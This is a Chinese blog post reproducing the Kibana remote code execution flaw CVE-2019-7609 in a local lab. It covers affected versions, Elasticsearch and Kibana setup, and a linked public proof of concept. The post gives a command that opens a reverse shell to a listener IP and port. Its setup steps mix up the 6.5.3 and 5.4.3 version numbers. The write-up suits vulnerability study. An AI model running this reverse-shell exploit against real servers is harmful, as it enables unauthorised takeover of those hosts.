欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Kibana远程代码执行漏洞(CVE-2019-7609)复现

程序员文章站 2022-07-15 11:22:48
...

简介

 

攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

 

影响版本


Kibana < 6.6.1

Kibana < 5.6.15

 

环境搭建

 

首先去官网下载6.5.3的tar包并解压

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz

tar -zxvf elasticsearch-6.5.3.tar.gz

然后运行

cd elasticsearch-6.5.3

./bin/elasticsearch 

不要用root用户运行

Kibana远程代码执行漏洞(CVE-2019-7609)复现

访问http://127.0.0.1:9200/

Kibana远程代码执行漏洞(CVE-2019-7609)复现

证明成功了

Kibana安装

官网下载压缩包并解压

wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz

tar –zxvf kibana-5.4.3-linux-x86_64.tar.gz

 

直接运行

cd kibana-5.4.3-linux-x86_64

./bin/kibana

 

Kibana远程代码执行漏洞(CVE-2019-7609)复现

访问http://127.0.0.1:5601/搭建成功

Kibana远程代码执行漏洞(CVE-2019-7609)复现

我们这里搭建的版本是6.5.3

Kibana远程代码执行漏洞(CVE-2019-7609)复现

漏洞复现

 

Poc地址

https://github.com/LandGrey/CVE-2019-7609

python 1.py -u 127.0.0.1:5601 -host 192.168.220.137 -port 6666 --shell

运行命令进行反弹shell

Kibana远程代码执行漏洞(CVE-2019-7609)复现

反弹成功

Kibana远程代码执行漏洞(CVE-2019-7609)复现

相关标签: 安全